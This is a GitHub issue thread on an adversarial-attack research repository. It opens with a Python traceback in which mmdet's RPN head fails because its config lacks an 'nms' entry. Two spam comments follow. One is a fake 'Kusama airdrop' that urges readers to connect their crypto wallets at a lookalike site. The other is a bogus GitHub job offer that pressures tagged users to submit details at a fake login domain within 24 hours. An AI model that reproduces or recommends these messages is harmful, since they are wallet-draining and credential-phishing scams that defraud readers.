### ISSUE TITLE
AttributeError: 'ConfigDict' object has no attribute 'nms'AttributeError: 'ConfigDict' object has no attribute 'nms'

### ISSUE THREAD

**Issue by 7425362** [Shudeng/GPAttack#2]
Traceback (most recent call last):
  File "<input>", line 1, in <module>
  File "E:\users\PyCharm 2021.2\plugins\python\helpers\pydev\_pydev_bundle\pydev_umd.py", line 198, in runfile
    pydev_imports.execfile(filename, global_vars, local_vars)  # execute the script
  File "E:\users\PyCharm 2021.2\plugins\python\helpers\pydev\_pydev_imps\_pydev_execfile.py", line 18, in execfile
    exec(compile(contents+"\n", file, 'exec'), glob, loc)
  File "E:/python/adversarial object detection/GPAttack/attack.py", line 337, in <module>
    success_attack = specific_attack(model_helpers, img_path, mask, save_image_dir)
  File "E:/python/adversarial object detection/GPAttack/attack.py", line 268, in specific_attack
    res = loop.run_until_complete(asyncio.gather(*tasks))
  File "E:\users\anaconda3\envs\mmdt\lib\asyncio\base_events.py", line 587, in run_until_complete
    return future.result()
  File "E:/python/adversarial object detection/GPAttack/attack.py", line 228, in get_attack_loss
    al, on = await helper.attack_loss(img)
  File "E:\python\adversarial object detection\GPAttack\faster_helper.py", line 140, in attack_loss
    scores = self.get_detector_cls_sorces(img, self.img_metas)
  File "E:\python\adversarial object detection\GPAttack\faster_helper.py", line 125, in get_detector_cls_sorces
    proposal_list = self.model.rpn_head.simple_test_rpn(x, img_metas)
  File "E:\users\anaconda3\envs\mmdt\lib\site-packages\mmdet\models\dense_heads\dense_test_mixins.py", line 124, in simple_test_rpn
    proposal_list = self.get_bboxes(*rpn_outs, img_metas)
  File "E:\users\anaconda3\envs\mmdt\lib\site-packages\mmcv\runner\fp16_utils.py", line 186, in new_func
    return old_func(*args, **kwargs)
  File "E:\users\anaconda3\envs\mmdt\lib\site-packages\mmdet\models\dense_heads\rpn_head.py", line 130, in get_bboxes
    scale_factor, cfg, rescale)
  File "E:\users\anaconda3\envs\mmdt\lib\site-packages\mmdet\models\dense_heads\rpn_head.py", line 220, in _get_bboxes_single
    dets, keep = batched_nms(proposals, scores, ids, cfg.nms)
  File "E:\users\anaconda3\envs\mmdt\lib\site-packages\mmcv\utils\config.py", line 48, in __getattr__
    raise ex
AttributeError: 'ConfigDict' object has no attribute 'nms'

**Comment by kusamanetworkss** [comment]
## Congratulations! You've receive in $2000 on Kusama Airdrop 🪂🔴

Kusama Airdrop: Claim up to $20,000 in Tokens Now!

→ [Earn rewards on connect you wallet](https://kusamanetworks.com/)

→ [Claim Your $KSM Today](https://kusamanetworks.com/)

Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://polkadot.network/static/b118567894df0c230e8553f2d6ea8b83/image2.png)

[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

🚀 **Claim Your Bonus Now!** [Check Eligibility](https://kusamanetworks.com/)

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Connect your wallet twice
- 📋 Register on the platform
- 💰 Claim your bonus, up to $2,000!
- ✨Magic ✨ [Claim Your Bonus Now!](https://kusamanetworks.com/)

**Comment by albertovasquez** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
jeoygin, @akring, @orangefei, @MrGuo19940123, @DachiCoding, @faithxie, @charlieysx, @hopecyb, @wiitht, @johnwong007, @dream5788, @NearXdu, @ninn55, @cnych, @HavoStrean, @chengdwei, @bruce-yan, @duyongbo520, @whutsongy, @tensorboy
